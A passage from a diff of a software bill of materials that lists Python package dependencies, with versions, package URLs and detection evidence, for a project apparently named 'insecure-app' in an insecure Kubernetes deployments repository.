"name": "sphinxcontrib-applehelp", + "version": "1.0.2", + "purl": "pkg:pypi/sphinxcontrib-applehelp@1.0.2", + "type": "library", + "bom-ref": "pkg:pypi/sphinxcontrib-applehelp@1.0.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "sphinxcontrib-devhelp", + "version": "1.0.2", + "purl": "pkg:pypi/sphinxcontrib-devhelp@1.0.2", + "type": "library", + "bom-ref": "pkg:pypi/sphinxcontrib-devhelp@1.0.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "sphinxcontrib-jsmath", + "version": "1.0.1", + "purl": "pkg:pypi/sphinxcontrib-jsmath@1.0.1", + "type": "library", + "bom-ref": "pkg:pypi/sphinxcontrib-jsmath@1.0.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "sphinxcontrib-htmlhelp", + "version": "2.0.0", + "purl": "pkg:pypi/sphinxcontrib-htmlhelp@2.0.0", + "type": "library", + "bom-ref": "pkg:pypi/sphinxcontrib-htmlhelp@2.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "sphinxcontrib-serializinghtml", + "version": "1.1.5", + "purl": "pkg:pypi/sphinxcontrib-serializinghtml@1.1.5", + "type": "library", + "bom-ref": "pkg:pypi/sphinxcontrib-serializinghtml@1.1.5", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "sphinxcontrib-qthelp", + "version": "1.0.3", + "purl": "pkg:pypi/sphinxcontrib-qthelp@1.0.3", + "type": "library", + "bom-ref": "pkg:pypi/sphinxcontrib-qthelp@1.0.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "Jinja2", + "version": "3.1.2", + "purl": "pkg:pypi/jinja2@3.1.2", + "type": "library", + "bom-ref": "pkg:pypi/jinja2@3.1.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "MarkupSafe", + "version": "2.1.1", + "purl": "pkg:pypi/markupsafe@2.1.1", + "type": "library", + "bom-ref": "pkg:pypi/markupsafe@2.1.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "Pygments", + "version": "2.15.1", + "purl": "pkg:pypi/pygments@2.15.1", + "type": "library", + "bom-ref": "pkg:pypi/pygments@2.15.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "docutils", + "version": "0.18.1", + "purl": "pkg:pypi/docutils@0.18.1", + "type": "library", + "bom-ref": "pkg:pypi/docutils@0.18.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "snowballstemmer", + "version": "2.2.0", + "purl": "pkg:pypi/snowballstemmer@2.2.0", + "type": "library", + "bom-ref": "pkg:pypi/snowballstemmer@2.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "Babel", + "version": "2.11.0", + "purl": "pkg:pypi/babel@2.11.0", + "type": "library", + "bom-ref": "pkg:pypi/babel@2.11.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pytz", + "version": "2023.3.post1", + "purl": "pkg:pypi/pytz@2023.3.post1", + "type": "library", + "bom-ref": "pkg:pypi/pytz@2023.3.post1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "alabaster", + "version": "0.7.12", + "purl": "pkg:pypi/alabaster@0.7.12", + "type": "library", + "bom-ref": "pkg:pypi/alabaster@0.7.12", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "imagesize", + "version": "1.4.1", + "purl": "pkg:pypi/imagesize@1.4.1", + "type": "library", + "bom-ref": "pkg:pypi/imagesize@1.4.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "tbb", + "version": "0.2", + "purl": "pkg:pypi/tbb@0.2", + "type": "library", + "bom-ref": "pkg:pypi/tbb@0.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "unidecode", + "version": "latest", + "purl": "pkg:pypi/unidecode@latest", + "type": "library", + "bom-ref": "pkg:pypi/unidecode@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "aiobotocore", + "version": "latest", + "purl": "pkg:pypi/aiobotocore@latest", + "type": "library", + "bom-ref": "pkg:pypi/aiobotocore@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "botocore", + "version": "1.29.76", + "purl": "pkg:pypi/botocore@1.29.76", + "type": "framework", + "bom-ref": "pkg:pypi/botocore@1.29.76", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "python-dateutil", + "version": "2.8.2", + "purl": "pkg:pypi/python-dateutil@2.8.2", + "type": "library", + "bom-ref": "pkg:pypi/python-dateutil@2.8.2", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "aiohttp", + "version": "3.8.5", + "purl": "pkg:pypi/aiohttp@3.8.5", + "type": "framework", + "bom-ref": "pkg:pypi/aiohttp@3.8.5", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "wrapt", + "version": "1.14.1", + "purl": "pkg:pypi/wrapt@1.14.1", + "type": "library", + "bom-ref": "pkg:pypi/wrapt@1.14.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "aioitertools", + "version": "0.7.1", + "purl": "pkg:pypi/aioitertools@0.7.1", + "type": "library", + "bom-ref": "pkg:pypi/aioitertools@0.7.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "aiofiles", + "version": "latest", + "purl": "pkg:pypi/aiofiles@latest", + "type": "library", + "bom-ref": "pkg:pypi/aiofiles@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "aiosignal", + "version": "latest", + "purl": "pkg:pypi/aiosignal@latest", + "type": "library", + "bom-ref": "pkg:pypi/aiosignal@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "frozenlist", + "version": "1.3.3", + "purl": "pkg:pypi/frozenlist@1.3.3", + "type": "library", + "bom-ref": "pkg:pypi/frozenlist@1.3.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "aiosqlite", + "version": "latest", + "purl": "pkg:pypi/aiosqlite@latest", + "type": "library", + "bom-ref": "pkg:pypi/aiosqlite@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "anaconda-anon-usage", + "version": "latest", + "purl": "pkg:pypi/anaconda-anon-usage@latest", + "type": "library", + "bom-ref": "pkg:pypi/anaconda-anon-usage@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "conda", + "version": "23.7.4", + "purl": "pkg:pypi/conda@23.7.4", + "type": "library", + "bom-ref": "pkg:pypi/conda@23.7.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "boltons", + "version": "23.0.0", + "purl": "pkg:pypi/boltons@23.0.0", + "type": "library", + "bom-ref": "pkg:pypi/boltons@23.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "conda-package-handling", + "version": "2.2.0", + "purl": "pkg:pypi/conda-package-handling@2.2.0", + "type": "library", + "bom-ref": "pkg:pypi/conda-package-handling@2.2.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "conda-package-streaming", + "version": "0.9.0", + "purl": "pkg:pypi/conda-package-streaming@0.9.0", + "type": "library", + "bom-ref": "pkg:pypi/conda-package-streaming@0.9.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "zstandard", + "version": "0.19.0", + "purl": "pkg:pypi/zstandard@0.19.0", + "type": "library", + "bom-ref": "pkg:pypi/zstandard@0.19.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "jsonpatch", + "version": "1.32", + "purl": "pkg:pypi/jsonpatch@1.32", + "type": "library", + "bom-ref": "pkg:pypi/jsonpatch@1.32", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "jsonpointer", + "version": "2.1", + "purl": "pkg:pypi/jsonpointer@2.1", + "type": "library", + "bom-ref": "pkg:pypi/jsonpointer@2.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pluggy", + "version": "1.0.0", + "purl": "pkg:pypi/pluggy@1.0.0", + "type": "library", + "bom-ref": "pkg:pypi/pluggy@1.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "pycosat", + "version": "0.6.4", + "purl": "pkg:pypi/pycosat@0.6.4", + "type": "library", + "bom-ref": "pkg:pypi/pycosat@0.6.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "toolz", + "version": "0.12.0", + "purl": "pkg:pypi/toolz@0.12.0", + "type": "library", + "bom-ref": "pkg:pypi/toolz@0.12.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "tqdm", + "version": "4.65.0", + "purl": "pkg:pypi/tqdm@4.65.0", + "type": "library", + "bom-ref": "pkg:pypi/tqdm@4.65.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "anaconda-catalogs", + "version": "latest", + "purl": "pkg:pypi/anaconda-catalogs@latest", + "type": "library", + "bom-ref": "pkg:pypi/anaconda-catalogs@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "intake", + "version": "0.6.8", + "purl": "pkg:pypi/intake@0.6.8", + "type": "library", + "bom-ref": "pkg:pypi/intake@0.6.8", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "appdirs", + "version": "1.4.4", + "purl": "pkg:pypi/appdirs@1.4.4", + "type": "library", + "bom-ref": "pkg:pypi/appdirs@1.4.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "dask", + "version": "2023.6.0", + "purl": "pkg:pypi/dask@2023.6.0", + "type": "library", + "bom-ref": "pkg:pypi/dask@2023.6.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "click", + "version": "8.1.7", + "purl": "pkg:pypi/click@8.1.7", + "type": "library", + "bom-ref": "pkg:pypi/click@8.1.7", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "cloudpickle", + "version": "2.2.1", + "purl": "pkg:pypi/cloudpickle@2.2.1", + "type": "library", + "bom-ref": "pkg:pypi/cloudpickle@2.2.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "fsspec", + "version": "2023.4.0", + "purl": "pkg:pypi/fsspec@2023.4.0", + "type": "library", + "bom-ref": "pkg:pypi/fsspec@2023.4.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "entrypoints", + "version": "0.4", + "purl": "pkg:pypi/entrypoints@0.4", + "type": "library", + "bom-ref": "pkg:pypi/entrypoints@0.4", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "msgpack", + "version": "1.0.3", + "purl": "pkg:pypi/msgpack@1.0.3", + "type": "library", + "bom-ref": "pkg:pypi/msgpack@1.0.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "PyYAML", + "version": "6.0", + "purl": "pkg:pypi/pyyaml@6.0", + "type": "library", + "bom-ref": "pkg:pypi/pyyaml@6.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "anaconda-cloud-auth", + "version": "latest", + "purl": "pkg:pypi/anaconda-cloud-auth@latest", + "type": "library", + "bom-ref": "pkg:pypi/anaconda-cloud-auth@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "keyring", + "version": "23.13.1", + "purl": "pkg:pypi/keyring@23.13.1", + "type": "library", + "bom-ref": "pkg:pypi/keyring@23.13.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "jaraco.classes", + "version": "3.2.1", + "purl": "pkg:pypi/jaraco.classes@3.2.1", + "type": "library", + "bom-ref": "pkg:pypi/jaraco.classes@3.2.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "more-itertools", + "version": "8.12.0", + "purl": "pkg:pypi/more-itertools@8.12.0", + "type": "library", + "bom-ref": "pkg:pypi/more-itertools@8.12.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "importlib-metadata", + "version": "6.0.0", + "purl": "pkg:pypi/importlib-metadata@6.0.0", + "type": "library", + "bom-ref": "pkg:pypi/importlib-metadata@6.0.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "zipp", + "version": "3.11.0", + "purl": "pkg:pypi/zipp@3.11.0", + "type": "library", + "bom-ref": "pkg:pypi/zipp@3.11.0", + "evidence": { + "identity": { + "field": "purl", + "confidence": 0.8, + "methods": [ + { + "technique": "manifest-analysis", + "confidence": 0.8, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + } + }, + "properties": [ + { + "name": "SrcFile", + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/requirements.txt" + } + ] + }, + { + "group": "", + "name": "SecretStorage", + "version": "3.3.1", + "purl": "pkg:pypi/secretstorage@3.3.1", + "type": "library", + "bom-ref": 